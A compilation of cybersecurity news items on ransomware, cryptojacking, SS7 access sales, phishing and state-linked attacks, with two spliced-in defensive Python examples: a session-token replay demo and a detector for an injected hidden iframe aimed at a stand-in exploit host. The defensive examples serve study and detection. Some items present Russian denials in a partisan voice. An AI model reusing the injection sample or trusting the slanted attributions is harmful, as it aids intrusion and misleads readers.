
Cybersecurity experts warned of a possible attack on Russian accounts in May

DeviceLock, a company specializing in data leak prevention, warned that an attack on Russians' accounts is being prepared for the May holidays, after access to the switch of one of the mobile operators was put up for sale on the darknet.

In particular, it is reported that in early March an offer appeared on the darknet to sell access to the switch of one of the mobile operators; connecting to it allows an attacker to take control of the SS7 signaling system, which routes the traffic of mobile operators.

The experts said the sellers were asking $30,000 for access to the switch, so the purchase only makes sense if a large-scale attack capable of recouping the expense is being prepared.

"Since attackers usually need from two weeks to a month to prepare an attack of this type, it can be timed to May holidays, when most Russians will loosen control over their accounts and other financial assets," summarized Olesya Yarmolenko, general director of Smart Line Inc (DeviceLock systems manufacturer).

According to her, this operator most likely has a cooperation agreement with one or more Russian cellular service providers. According to DeviceLock data, access to the switch may have reached a buyer from the CIS countries in early April, and because of the widespread use of online banking and relatively high account balances, Russia has always been the most desirable target for online fraudsters.

Sergey Nenakhov, head of the information security audit department at Infosecurity (a Softline company), advised clients to switch the two-factor protection of critical services from SMS to push notifications, or to use dedicated authenticator applications that generate one-time codes directly on the device itself.

VTB is reportedly aware of the risk of attacks on citizens through message interception, but the bank stated that its adopted set of technical measures does not allow attackers to use this technique to gain access to clients' funds.

At the same time, representatives of mobile operators did not respond to inquiries about the risks of attacks through the SS7 standard.

Cryptojacking Spree: Targeting Washington State Educational Institutions


According to a new advisory from Palo Alto Networks' Unit 42 team, cryptojacking incidents have recently taken place against educational institutions in Washington State. Threat actors are targeting educational institutions in the United States with the aim of compromising their networks and covertly mining cryptocurrency.

Cryptojacking is a form of cyberattack in which attackers use deception to install cryptocurrency-mining components that consume the victim's computing power without being noticed or detected.

On February 16, cybersecurity researchers discovered the first attack, which consisted of a malicious HTTP request sent to a domain owned by an educational institution. Security teams initially mistook it for a trivial command injection flaw, but it turned out to be a command for a web shell backdoor that attackers used to gain access to the institution's network. 

In this form of attack, attackers use various types of miner software to try to generate cryptocurrencies such as Monero, Litecoin, Bitcoin, and Ethereum. Attackers typically compromise a large number of systems to make the attacks lucrative and bring in more cryptocurrency. 

The researchers say that a UPX-packed cpuminer -- used to mine LTC and BTC -- has been delivered by way of malicious traffic. 

If deployment is successful, the backdoor is then able to fetch and execute the crypto-mining payload. The malware also downloads a mini shell that masquerades as a wp-load.php file. "Since the mini shell is not moved elsewhere, we speculate that the current directory of the mini shell, as well as the backdoor, is a web directory exposed to the internet," the report states.

Cryptocurrency mined on infected systems is sent to two wallets owned by the operators. Two other incidents differed in their user agent strings, pass values, and mining algorithms, but the general attack method remained the same.

"The malicious request [...] exhibits several similarities," Unit 42 noted. "It's the same attack pattern delivering the same cpuminer payload against the same industry (education), suggesting it's likely the same perpetrator behind the cryptojacking operation."

An analysis of K-12 schools across the United States, published in March, found that 2020 was a "record-breaking" year for cybersecurity incidents. Over 400 incidents were reported in the study, including ransomware, phishing attempts, website defacement, and denial-of-service (DoS) attacks.

Cring Ransomware Attacks Exploited Fortinet Flaw


Ransomware operators shut down two production facilities belonging to a European manufacturer after deploying a relatively new strain that encrypted the servers controlling the manufacturer's industrial processes, a Kaspersky Lab researcher said on Wednesday. The attackers are exploiting a Fortinet vulnerability flagged by US federal agencies a week earlier to deliver the new strain, named Cring, against industrial enterprises across Europe.

Researchers say the attackers are exploiting an unpatched path-traversal flaw, tracked as CVE-2018-13379, in Fortinet's FortiOS. The goal is to gain access to the victim's enterprise network and ultimately deploy ransomware, according to the Kaspersky Lab report. "In at least one case, an attack of the ransomware resulted in a temporary shutdown of the industrial process due to servers used to control the industrial process becoming encrypted," Kaspersky senior security researcher Vyacheslav Kopeytsev wrote in the report.

Cring is a relative newcomer to a ransomware scene currently dominated by strains such as REvil, Ryuk, Maze, and Conti. It was first spotted and reported by the analyst known as Amigo_A and Swisscom's CSIRT team in January. The ransomware is unusual in that it uses two types of encryption and destroys backup files, preventing victims from recovering their data from backups without paying the ransom. A week earlier, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) warned that nation-state advanced persistent threat (APT) groups were actively exploiting known vulnerabilities in Fortinet's FortiOS operating system, affecting the company's SSL VPN products.

In its report, Kaspersky echoed the federal warning, adding that attackers first scan for Fortinet VPN connections to check whether the software on the device is a vulnerable version. The goal is to break into the affected hardware, obtain network credentials, and establish a foothold in the targeted network, Kopeytsev explained. "A directory-traversal attack allows an attacker to access system files on the Fortigate SSL VPN appliance," he wrote. "Specifically, an unauthenticated attacker can connect to the appliance through the internet and remotely access the file 'sslvpn_websession,' which contains the username and password stored in cleartext."

IT Services Remain Disrupted At Two Colleges Of Ireland After Ransomware Attacks


Two Irish third-level institutions, the National College of Ireland (NCI) and the Technological University of Dublin, have been hit by cyber attacks.

Both institutions recently reported ransomware attacks on their systems. The National College of Ireland is currently working around the clock to restore its IT services after the attack; in the meantime, its IT systems remain offline.

"NCI is currently experiencing a significant disruption to IT services that have impacted a number of college systems, including Moodle, the Library service, and the current students’ MyDetails service," the college reported on Saturday. 

Press reports say that the two third-level institutions experiencing the attacks, described as ransomware attacks, have no definite timeline for when IT services will be fully restored.

In the wake of the attacks, both institutions immediately notified students, staff, and other employees. NCI's IT department subsequently suspended access to its systems, and the campus building was closed to staff and students until the IT services are fully recovered.

NCI has also reported the attack to the authorities, including the national police service of the Republic of Ireland and the Data Protection Commissioner.

"Please note that all classes, assessments, and induction sessions planned from today Tuesday 6th until this Thursday 8th April inclusive have been postponed and will be rescheduled for a later date," NCI added in a statement issued today. 

"…The College will issue a further update on Thursday afternoon in relation to classes and other events for Friday and beyond." Students with assignments due this week were told that "no late penalties will be applied while the outage remains in place."

Meanwhile, students were also told not to access any campus systems until Monday, April 12, and were advised to avoid contacting the IT staff who are currently working on restoring the attacked systems.

Russian intelligence was accused of cyber attacks on Lithuania's top leadership

Last year, hacker groups controlled by Russian secret services conducted cyber attacks on Lithuania's top leadership, according to the annual report on the state of national cybersecurity published by the Ministry of Defense of the Baltic republic.

The document claims that Lithuanian foreign policy and national security institutions, as well as energy and education facilities were attacked by Russian intelligence.

"Groups controlled by Russian intelligence services also used the Lithuanian information technology sector infrastructure for cyber attacks against targets in Western countries. For example, in July 2020, there were cyber attacks by the APT29 cyber group against organizations developing a coronavirus vaccine in the West that were carried out using Lithuanian IT infrastructure," the report said.

As noted in the document, some of the cyber incidents registered in the republic last year are associated with "political, geopolitical, strategic events in Lithuania, the region and around the world."

According to the report, "it is assumed that hostile intelligence services seek to illegally obtain information about vulnerabilities in Lithuanian communication and information systems, as well as personal user information (account login data) and use it for other cyber incidents".

As an example, a cyber attack was reported in December 2020, when 24 public sector websites were hacked, three of which published fake news with different content. An investigation into the incident revealed that it had been prepared in advance and was carried out in an orderly manner.

Cyberattacks on Lithuanian state institutions are reported frequently. Most are attributed to "Russian hackers" or hinted to be the work of "unfriendly countries," although no evidence has been found.

Moscow has repeatedly stressed that accusations by Western partners are unfounded.

In addition, the authorities of the Baltic States have consistently obstructed the work of the Russian media. As the Russian Foreign Ministry noted, signs of coordination are clearly visible in the actions of Vilnius, Riga and Tallinn, and the cases of media harassment in the Baltic countries clearly demonstrate what the demagogic statements of these countries about their adherence to the principles of democracy and freedom of speech are worth in practice.

It's interesting to note that the report released by the Lithuanian Ministry of Defense shows that cyber incidents in Lithuania increased by 25 percent in 2020, and the number of incidents involving malware increased by 49 percent.

Active Cyber Attacks on Mission-Critical SAP Apps


Security researchers are warning of active attacks targeting SAP enterprise applications that have not been patched against vulnerabilities for which fixes are available, or that use accounts with weak or default passwords.

Over 400,000 organizations worldwide and 92% of Forbes Global 2000 use SAP's enterprise apps for supply chain management, enterprise resource planning, product lifecycle management, and customer relationship management.

According to a study released jointly by SAP and Onapsis, threat actors launched at least 300 successful attacks on unprotected SAP instances beginning in mid-2020. Six vulnerabilities have been exploited, some of which can provide complete control over unsecured applications. Even though SAP had released fixes for all of these flaws, the targeted companies had not installed them or were using unsecured SAP user accounts. 

"We're releasing the research Onapsis has shared with SAP as part of our commitment to help our customers ensure their mission-critical applications are protected," Tim McKnight, SAP Chief Security Officer, said. 

"This includes applying available patches, thoroughly reviewing the security configuration of their SAP environments, and proactively assessing them for signs of compromise." Researchers observed attackers targeting six flaws which, if exploited, can be used for lateral movement across the business network to compromise other systems.

The threat actors behind these attacks have exploited multiple security vulnerabilities and insecure configurations in SAP applications in attempts to breach the targets' systems. In addition, some of them have also been observed while chaining several vulnerabilities in their attacks to "maximize impact and potential damage."

According to an alert issued by CISA, organizations impacted by these attacks could experience theft of sensitive data, financial fraud, disruption of mission-critical business processes, ransomware, and a halt of all operations.

Patching vulnerable SAP systems should be a priority for all defenders since Onapsis also found that attackers start targeting critical SAP vulnerabilities within less than 72 hours, with exposed and unpatched SAP apps getting compromised in less than three hours. 

Both SAP and Onapsis recommend that organizations protect themselves from these attacks by immediately performing a compromise assessment on SAP applications still exposed to the targeted flaws, prioritizing internet-facing SAP applications.

Also, companies should assess all applications in the SAP environment for risk as soon as possible and apply the relevant SAP security patches and secure configurations; and assess SAP applications to uncover any misconfigured high-privilege user accounts.

"The critical findings noted in our report describe attacks on vulnerabilities with patches and secure configuration guidelines available for months and even years," said Onapsis CEO Mariano Nunez.

"Companies that have not prioritized rapid mitigation for these known risks should consider their systems compromised and take immediate and appropriate action" Nunez added.

Molson Coors "Cyberattack Incident" Could Cost Company $140 Million


The producer of popular US beer brands such as Molson Canadian, Coors Light, Miller Lite, Carling, Blue Moon, and Coors Banquet has disclosed severe impacts of a cyberattack on its business, including brewery operations, production, and shipments.

Brewing giant Molson Coors stated that the disruptive cyberattack caused major disruption to its brewery operations and is going to cost the organization around $140 million. Company officials added that they are working hard to return to normal, but production and shipping have yet to reach normal operating levels.

“Despite this progress led by the significant efforts of the Molson Coors team, along with the support of leading forensic information technology firms and other advisors, the Company has experienced and continues to experience some delays and disruptions in its business, including brewery operations, production, and shipments in the U.K., Canada, and the U.S.,” a March 26 statement reads. 

The firm did not name a cause for what it calls a "cybersecurity incident", but the event comes amid a wave of malware and ransomware attacks with a huge impact on companies worldwide. Recent attacks have affected healthcare providers, computer maker Acer, IoT provider Sierra Wireless, and various other large companies.

The company stated that the cyber attack will affect its first-quarter results and consequently its 2021 financial revenue, but it has not released specific figures on expected costs. Returning to normal revenue will take time and effort.

According to the company, “the cybersecurity incident and the February winter storms in Texas will shift between 1.8 and 2.0 million hectoliters of production and shipments from the first quarter 2021 to the balance of the fiscal year 2021 and will also shift between $120 million to $140 million of underlying EBITDA from the first quarter 2021 to the balance of the fiscal year 2021.” 

The company has yet to share technical details of the incident, but various experts speculate that it could be ransomware-related.

“We notified law enforcement and are cooperating in their investigation. We also have notified and are working with all of our relevant insurance companies,” the company said in a statement.

Attackers found abusing GitHub Infrastructure to Mine Cryptocurrency


Microsoft-owned GitHub is the latest cyberattack victim, with reports of cybercriminals abusing GitHub's cloud infrastructure to mine cryptocurrency. The code repository hosting service has started an investigation into a series of attacks aimed at illicitly using its infrastructure for mining.

GitHub Actions is a continuous integration (CI) and continuous deployment (CD) solution that makes it easy to automate software workflows and set up periodic tasks. In this attack, the attacker adds malicious GitHub Actions workflow code to a fork of a legitimate repository and then opens a Pull Request against the original repository, ostensibly for the maintainers to merge the code back.

“In a phone call, Dutch security engineer Justin Perdok told The Record that at least one threat actor is targeting GitHub repositories where Actions might be enabled. The attack involves forking a legitimate repository, adding malicious GitHub Actions to the original code, and then filing a Pull Request with the original repository in order to merge the code back into the original.” reported The Record. 

"But the attack doesn't rely on the original project owner approving the malicious Pull Request. Just filing the Pull Request is enough for the attack, Perdok said." This applies in particular to GitHub projects that have automated workflows set up to validate incoming Pull Requests via Actions. As soon as a Pull Request is created against the original project, GitHub's systems execute the attacker's workflow code, which instructs GitHub's servers to retrieve and run a crypto miner.

This isn't the first time GitHub Actions has been abused in this way. An identical attack was previously identified by programmer Yann Esposito, who found a malicious Pull Request filed against his own GitHub project.

Last year, BleepingComputer reported on GitHub being used to host the wormable botnet Gitpaste-12, which reappeared with over 30 exploits the following month. Unlike Gitpaste-12 or the Octopus Scanner malware, which targeted vulnerable projects and computers, this attack appears to abuse GitHub's own servers solely for crypto mining.

In an email, GitHub told The Record that they are “aware of this activity and are actively investigating”. For now, the attack does not appear to damage users’ projects in any way and seems to be solely focused on abusing GitHub infrastructure.

Medical Professionals of U.S. and Israel Targeted in a 'BadBlood' Phishing Campaign


Email security firm Proofpoint has exposed a hacking group linked to the Iranian government targeting nearly two dozen medical researchers in Israel and the U.S. The targeted professionals work mainly in the oncology, genetics, and neurology fields. Proofpoint named the phishing campaign 'BadBlood' because of its focus on medical professionals.

According to Proofpoint, the Iranian hacking group is tracked under several names, including TA453, Charming Kitten, Phosphorus, APT35, ITG18, Ajax Security Team, NewsBeef, and Newscaster. The group, which has been operating since 2011, specifically targets medical professionals, activists, and journalists in the Middle East, the U.K., and the U.S.

To lure victims, the group used a Gmail account in the name of prominent Israeli physicist Daniel Zaifman. From this account the attackers sent a series of malicious emails to the medical professionals, claiming to contain sensitive information on Israel's nuclear program.

The malicious emails contained a link that directed victims to a fake Microsoft login page, which harvested the users' email credentials. Although the motive for the attack is not yet clear, many researchers believe the operation was conducted to acquire medical research or private health data on intelligence targets of interest to Tehran.

“While this campaign may represent a shift in TA453 targeting overall, it is also possible it may be an outlier, reflective of a specific priority intelligence tasking given to TA453. While targeting medical experts in genetics, neurology and oncology may not be a lasting shift in TA453 targeting, it does indicate at least a temporary change in TA453 collection priorities. BadBlood is aligned with an escalating trend globally of medical research being increasingly targeted by espionage motivated focused threat actors,” Proofpoint stated.

Live Broadcast Disrupted by Cyber-Attack on Australian TV Network Nine

A cyber-attack on Australia's Channel Nine TV network has interrupted live broadcasts, raising questions about the country's exposure to hackers. 'Weekend Today', the broadcaster's Sunday morning news program that airs from 7:00 a.m. to 1:00 p.m. from its Sydney headquarters, was unable to go on air. In addition, the network's 5:00 p.m. newscast was not broadcast in Melbourne.

The hack was being investigated as "criminal sabotage or the work of a foreign nation," according to Nine. On Sunday, Australia's parliament was also looking into a potential cyber-attack in Canberra. Access to IT systems and email at Parliament House has been restricted as a precaution, according to Assistant Defense Minister Andrew Hastie.

“We wish to inform you there has been a cyber-attack on our systems which has disrupted live broadcasts out of Nine Sydney,” reads an email sent by the company to staff. “Our IT teams are working around the clock to fully restore our systems which have primarily affected our broadcast and corporate business units.” 

The company reported that it had put contingencies in place to ensure that its NRL and 6:00 pm news broadcasts would go ahead as scheduled. The IT team has been working nonstop to fully restore the systems, which mainly affected the broadcast and corporate business units; the publishing and radio systems are still up and running.

The broadcaster expressed optimism that the 'Today Show' would be able to resume normal programming. Until further notice, all employees have been asked to work from home. According to the company, email did not appear to be affected, but the Nine IT network was. The company had previously reported that it was "responding to technical issues" affecting its live broadcasting.

“Cyber hackers have targeted Channel Nine in a massive ransomware attack bringing down its network Australia-wide. No-one has claimed responsibility for the bug but IT experts are working to bring systems back on-line,” said Loxley. 

According to a source, Nine management had told staff that a "malicious" cyber-attack was suspected as the cause. The Australian Financial Review, which is also owned by Nine, also announced that the media group was possibly the victim of a cyber-attack, which could have long-term consequences.

CNA Hit by a Phoenix CryptoLocker Ransomware Attack


Insurance giant CNA had to shut down its systems and temporarily take its website offline because of a novel ransomware attack. A new version of the Phoenix CryptoLocker malware was used in the attack, which happened earlier this week and is believed to be linked to the Evil Corp hacking group.

CNA, a Chicago-based company, is the seventh-largest commercial insurance provider in the world. In a statement published on the home page of its website on Sunday, March 21, the company confirmed that it had "sustained a sophisticated cybersecurity attack". "The attack caused a network disruption and impacted certain CNA systems, including corporate email," it added.

According to a report, CNA was hit by the recently discovered ransomware named Phoenix CryptoLocker, though the organization did not comment on the nature of the incident. CryptoLockers are a common form of ransomware that encrypts files on the computers it infects and demands a ransom from victims in return for the key to decrypt them.

As per the report, the cybercriminals behind Phoenix CryptoLocker are probably a well-known group such as Evil Corp, which recently resurfaced after a short break from cybercrime. The effect of the group's most recent attack was so severe that CNA disconnected its systems from its network "out of an abundance of caution" and is now offering workarounds to employees wherever possible so that the company can continue to serve its customers, according to the company. The ransomware reportedly encrypted data on over 15,000 machines on CNA's corporate network, as well as the computers of remote-working employees who were connected to the company's VPN at the time of the attack.

The ransomware appended the '.phoenix' extension to encrypted files and dropped a ransom note called 'PHOENIX-HELP.txt' while encrypting computers. Although sources said CNA will restore from backups, the company has not confirmed this.

According to the report, based on similarities to code from ransomware previously used by Evil Corp, sources believe Phoenix CryptoLocker is the work of the same group. Evil Corp used WastedLocker ransomware to encrypt victims' files in earlier attacks, such as the one against GPS technology provider Garmin last year. The cybercriminal organization has made millions of dollars through several nefarious operations, including stealing banking credentials with the Dridex banking trojan and then making illicit money transfers from unsuspecting victims' bank accounts.

The attack on CNA could also have a huge impact on certain businesses, particularly those that hold cyber insurance policies with the company. Hacking the insurer's network and stealing insurance details about its customers couldn't have been a better way to generate a list of insured companies to strike. It is not yet known whether the cybercriminals stole files before encrypting CNA's devices. However, since ransomware operations have made stealing unencrypted data a standard technique, it's possible that some data was taken during the attack.

Ransomware Attacks Targeting UK’s Education Sector Increased, says NCSC


According to a warning from GCHQ's cybersecurity arm, the NCSC, there has been a substantial spike in the number of ransomware attacks targeting the education sector over the last month, just as schools were getting ready to resume in-person classes.

Ransomware attacks on the UK education sector have been on the rise, according to the new NCSC alert. The alert covers developments seen in August and September 2020, along with attacks that have occurred since February 2021, and offers mitigation recommendations to help in the defense of this sector.

According to the report, senior leaders must recognize the magnitude of the threat and the ability of ransomware to cause serious harm to their organizations, both through exposure of information and through loss of access to important services.

Ransomware encrypts servers and files, making it impossible for organizations to provide services. Cybercriminals are betting that the pressure on schools and colleges to keep teaching will lead targeted organizations to give in to extortion demands and pay a bitcoin ransom in return for the decryption key needed to recover the network. Increasingly, cybercriminals also threaten to publish confidential data taken from the network during the attack if the ransom is not paid. In many high-profile cases they have followed through, exposing confidential data publicly, mostly via "name and shame" sites on the darknet.

"In recent incidents affecting the education sector, ransomware has led to the loss of student coursework, school financial records, as well as data relating to COVID-19 testing," the agency said. 

Ransomware attacks can be crippling to organizations, and victims can take a considerable time to recover and restore vital services. These incidents can also be high-profile, attracting a great deal of attention from the public and the media.

There are many ways for ransomware attackers to gain entry to a victim's network. Remote Desktop Protocol (RDP) is one of the most commonly used protocols for remote desktop access, according to the NCSC, allowing staff to reach their office desktop computers or servers from a remote device over the internet. Ransomware attackers often use insecure RDP and virtual private network (VPN) configurations to gain initial access to victims' computers.

"This is a growing threat and we strongly encourage schools, colleges, and universities to act on our guidance and help ensure their students can continue their education uninterrupted", says NCSC. 

To protect against malware and ransomware threats, the NCSC advises organizations to adopt a "defense in depth" approach. Its guidance for schools, colleges, and universities includes having an effective plan for vulnerability management and deploying security fixes, protecting remote web services with multi-factor authentication, and installing and enabling anti-virus software.

Great Britain named Russia as the main threat in cyberspace

Lindy Cameron, executive director of Britain's National Cyber Security Center (NCSC), said on Friday that the Russian Federation poses the greatest threat to Britain in cyberspace.

According to her, as in any other area related to security, in cyberspace, Russia poses the most acute and urgent threat to the United Kingdom.

"We need to look carefully at China's ambitions for technological development. China will change the world we live in in a much more fundamental way than Russia," said Cameron.

Against the backdrop of the current world situation, she urged against complacency, complaining that cybersecurity is still not getting the attention it deserves. She also cited the attacks involving the IT company SolarWinds and Microsoft's Exchange Server.

E Hacking News reminds that the NCSC is part of GCHQ (Government Communications Headquarters), the British intelligence agency responsible for signals intelligence and for protecting government and military information. The NCSC, in turn, works with the public and commercial sectors to respond to cyberattacks and to protect private and public information networks.

In December 2020, U.S. media reported that hackers linked to a foreign government had broken into systems belonging to the U.S. Treasury Department, the Department of Homeland Security, the Commerce Department's National Telecommunications and Information Administration (NTIA), as well as networks at the Pentagon, the Department of Energy and the National Nuclear Security Administration (NNSA). A number of U.S. officials said the hacker group APT29, or Cozy Bear, allegedly linked to Russian intelligence, was likely behind the attacks.

Later it became known that the attack was carried out through SolarWinds, an IT company based in Austin, Texas: the hackers planted a backdoor in updates the company released for its Orion software between March and June last year, so that every customer who installed them was exposed.

In March of this year, Microsoft warned that a hacker group allegedly backed by the Chinese government was exploiting security vulnerabilities in its Exchange Server email software, which is widely used by U.S. agencies and companies.

Anonymous Hackers reportedly exposed the anti-Russian activities of the British Council

The Anonymous hacker group published an analysis of documents belonging to various British government agencies, including the Foreign Office, according to the local media reports. 

Anonymous previously accused British authorities and media organizations of influencing Russian-language media and trying to shape their audiences' thinking in the way the West wants. In support of this claim, the hackers published hundreds of copies of files that they described as documents of the British Foreign Office, Parliament and organizations working for the authorities.

The analysis notes that the purpose of such manipulations is to change power in Russia and change the Kremlin's foreign policy.

It is also claimed that the British Council cooperates with British intelligence to make its work more effective.

The hackers noted the organization's activity in Russia's neighboring states: in the Caucasus, Moldova, Belarus and Ukraine.

"The British Council's operations in the Baltic States are well documented: they are designed to socially unite Russian-speaking communities in these countries, to make sure they have strong ties among themselves and feel an affinity with British and European values and culture, and are resistant to destabilizing narratives. Brilliant brainwashing," writes Anonymous.

The group cites photocopies of files as proof, among them a call for proposals for English-language communication in the South Caucasus, Moldova and Belarus for fiscal years 2019-2022. Anonymous claims it is a copy of a Foreign Office document, but it bears no logos or markings that would confirm this.

According to this document, the British state was willing to allocate 650,000 pounds per year for English-language training in these regions, so the total cost of the three-year programme should not exceed 1.95 million pounds.

However, according to Anonymous, the real purpose of the humanitarian programs of the British authorities in the post-Soviet space is "to break the foundations of the regime in Russia or to change its foreign policy".

Due to a Cyber Attack, MangaDex Website Taken Down for 2 Weeks


On 17 March, MangaDex discovered that a malicious actor had gained access to an administrative account. According to the site's notice, the attacker reused a session token from an older database leak, which still worked because of a flaw in the session-management configuration. The team located and patched the vulnerable code and invalidated session data globally to block further attempts using the same technique. 
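An added example, not MangaDex's code, showing why a token lifted from an old database dump should never still be usable. The weak pattern (raw tokens, no expiry, no global revocation) is contrasted with a store that keeps only a hash, gives every session an expiry, and can invalidate all outstanding sessions at once after an incident. The class and function names, the TTL and the injectable clock are assumptions made for the example.

```python
import hashlib
import secrets
import time


class LeakyStore:
    """The pattern that makes an old database dump dangerous (assumed for
    the example): raw tokens in the table, no expiry, no way to log
    everyone out. Whoever reads the table owns every session in it."""

    def __init__(self):
        self.rows = {}                      # raw token -> user

    def issue(self, user):
        token = secrets.token_urlsafe(32)
        self.rows[token] = user
        return token

    def lookup(self, token):
        return self.rows.get(token)


class SessionStore:
    """Server-side sessions that survive a database leak:
      * only SHA-256(token) is stored, so a copy of the table cannot be
        replayed as a cookie;
      * each row carries an absolute expiry, so stale tokens die on their own;
      * a store-wide generation counter invalidates every session at once."""

    def __init__(self, ttl_seconds=12 * 3600, clock=time.time):
        self.ttl = ttl_seconds
        self.clock = clock                  # injectable for deterministic tests
        self.generation = 0
        self.rows = {}                      # sha256(token) -> (user, expires_at, generation)

    @staticmethod
    def _hash(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user):
        token = secrets.token_urlsafe(32)   # 256 bits of entropy, never stored raw
        self.rows[self._hash(token)] = (user, self.clock() + self.ttl, self.generation)
        return token

    def lookup(self, token):
        """Return the user for a live token, or None (and purge dead rows)."""
        key = self._hash(token)
        row = self.rows.get(key)
        if row is None:
            return None
        user, expires_at, gen = row
        if self.clock() >= expires_at or gen != self.generation:
            del self.rows[key]
            return None
        return user

    def logout(self, token):
        self.rows.pop(self._hash(token), None)

    def revoke_all(self):
        """Incident response: every token issued before this call stops working."""
        self.generation += 1


def replay_from_dump(store):
    """What an attacker can do with a copy of the session table: present every
    stored value as a cookie. Returns the users whose sessions were hijacked."""
    return [u for u in (store.lookup(v) for v in list(store.rows)) if u]


if __name__ == "__main__":
    leaky, safe = LeakyStore(), SessionStore()
    leaky.issue("alice"); safe.issue("alice")
    print("leaky store, sessions hijacked from dump:", replay_from_dump(leaky))
    print("hashed store, sessions hijacked from dump:", replay_from_dump(safe))
```

The generation counter is the cheap way to do the "sweep session data globally" step mentioned in the notice without touching every row; a per-user counter added alongside it gives "log out everywhere" for a single account.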

After the breach, the team spent several hours analysing the code and began patching. This happened while the site had already been reopened, because the team, by its own admission, mistakenly believed the attacker could no longer get in. As a precaution, the infrastructure is being monitored in case the attacker returns. 

Afterwards, the attacker emailed a few users with the message "MangaDex has a DB leak. I suggest you tell their staff about it," according to the website's official notice. Since then, MangaDex has been working to keep the site and its users safe from further disruption and security problems. 

MangaDex was fairly transparent about the breach, sharing information via Twitter rather than hushing up the details. The team nevertheless recommends that users take immediate steps to secure their online identity: a database breach has not yet been confirmed, but anyone who reuses the same password across sites should change it on those other sites too. 

MangaDex also confirmed that the site will stay offline for a full rewrite, MangaDex v5, which may take two weeks to complete. The team considered other options, such as bringing the site back in its present state, but judged that this would leave MangaDex open to further attacks. The new site will launch with only basic features: once v5 is out, users will be able to read, upload and follow, as on the original site. 

The team confirmed that MangaDex v3 is back with limited functionality, such as letting users export their bookmarks. A bug bounty programme may also be set up for v5, to help MangaDex find and patch exploitable bugs before attackers can use them to break the site.

Hackers used 11 Zero-Days to Attack Windows, iOS, Android Users


Google's Project Zero has detailed a sophisticated APT group that burned through at least 11 zero-day exploits in less than a year to conduct mass spying across a range of platforms and devices. The group used "watering hole" attacks to redirect specific targets to a pair of exploit servers delivering malware to Windows, iOS and Android devices. 

The cross-platform capability and the willingness to burn nearly a dozen zero-days in under a year point to a well-resourced threat actor with access to hacking tools and exploits from related groups. In a new blog post, Google Project Zero researcher Maddie Stone released additional details on the exploit chains found in the wild last October and noted that the latest disclosure is tied to a February 2020 campaign that also used multiple zero-days. According to Stone, the actor behind the February 2020 campaign went dark for a few months but returned in October with dozens of websites redirecting to an exploit server. 

“Once our analysis began, we discovered links to a second exploit server on the same website. After initial fingerprinting (appearing to be based on the origin of the IP address and the user-agent), an iframe was injected into the website pointing to one of the two exploit servers. In our testing, both of the exploit servers existed on all of the discovered domains,” Stone explained. 

The first exploit server initially responded only to Apple iOS and Microsoft Windows user-agents and remained active for at least a week after Google's researchers began recovering the exploits. It hosted a remote code execution exploit for the Chrome rendering engine and a V8 zero-day that was swapped in after the initial bug was fixed. Stone said the first server briefly responded to Android user-agents as well, suggesting the group had exploits for all of the major platforms.
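An added example, not code from Project Zero or the article, for the iframe-injection step Stone describes above. A site owner who suspects a watering-hole compromise can diff served pages against a known-good copy; failing that, the check below flags any iframe that points off-site or is sized or styled to be invisible. The HTML and the hostnames are constructed for the example; `cdn.invalid` stands in for an exploit server.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page: a legitimate calendar embed, a local widget, and one
# injected, effectively invisible iframe pointing at a foreign host.
SAMPLE_HTML = """
<html><body>
<h1>Community news</h1>
<iframe src="https://www.example.org/embed/calendar" width="600" height="400"></iframe>
<iframe src="https://cdn.invalid/x.html" width="0" height="0" style="display:none"></iframe>
<script src="https://www.example.org/js/app.js"></script>
<iframe src="/local/widget.html"></iframe>
</body></html>
"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def is_hidden(attrs):
    """Zero/one-pixel frames or CSS that hides them: nobody embeds content that way."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = attrs.get("width", "").strip() in {"0", "1"} or attrs.get("height", "").strip() in {"0", "1"}
    return tiny or "display:none" in style or "visibility:hidden" in style


def find_suspicious_iframes(html, page_host):
    """Return every iframe whose src points off-site or that is hidden.
    page_host is the hostname the page was fetched from; relative srcs
    are same-site by definition."""
    collector = IframeCollector()
    collector.feed(html)
    hits = []
    for frame in collector.iframes:
        src = frame.get("src", "")
        host = urlparse(src).hostname
        offsite = host is not None and host.lower() != page_host.lower()
        hidden = is_hidden(frame)
        if offsite or hidden:
            hits.append({"src": src, "offsite": offsite, "hidden": hidden})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_iframes(SAMPLE_HTML, "www.example.org"):
        print(hit)
```

Because the servers in this campaign fingerprinted by IP range and user-agent before injecting, a crawl from the defender's own network may see a clean page; fetch with the user-agents the campaign targeted and from an address range a victim would use, or pull the page from a client-side capture.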

Stone noted that the attackers used a unique obfuscation and anti-analysis check on iOS devices: the exploits were encrypted with ephemeral keys, "meaning that the exploits couldn't be recovered from the packet dump alone, instead requiring an active MITM on our side to rewrite the exploit on-the-fly."

Polish authorities got hacked for the sake of a fake allegation of nuclear waste leakage from Lithuania

Two Polish government websites were hacked to spread false information about a nuclear waste "leak" in neighboring Lithuania.

The incident took place on Wednesday. False information about a non-existent radioactive threat was published on the websites of the Polish National Atomic Energy Agency and the Polish Ministry of Health. In addition, the Twitter account of a journalist who "often writes about Russia and Eastern European countries" was hacked. His page was used to further spread misinformation.

The false statement said that the health and lives of Poles living near the Lithuanian border were in danger. However, the reports did not seem to get much attention.

Polish Security Service spokesman Stanislav Zarin said that "the whole story looked like a typical Russian attempt" to sow suspicion and discord among Western allies.

Zarin said he remembered a similar hacking attempt in 2020 that spread false information about a nonexistent radioactive cloud headed for Poland from Chernobyl in Ukraine.

In February, the Lithuanian Foreign Ministry drew attention to the recent intensification of information and cyber attacks aimed at damaging friendly Lithuanian-Polish relations and "blackmailing the Lithuanian and Polish peoples."

Official Vilnius and other Western countries regularly accuse the Russian side of "cyber attacks" without any evidence or concrete facts. Often Lithuanian politicians hint at the involvement of "Russian hackers" or that they were carried out by "unfriendly countries," although no evidence has been found.

As Russian authorities and experts have repeatedly noted, Moscow has no reason to attack Lithuania or other NATO countries, either real or virtual. Russia rejects all the accusations, noting that they are completely unfounded.

Electronics Giant Acer Hit by $50 Million Ransomware Attack


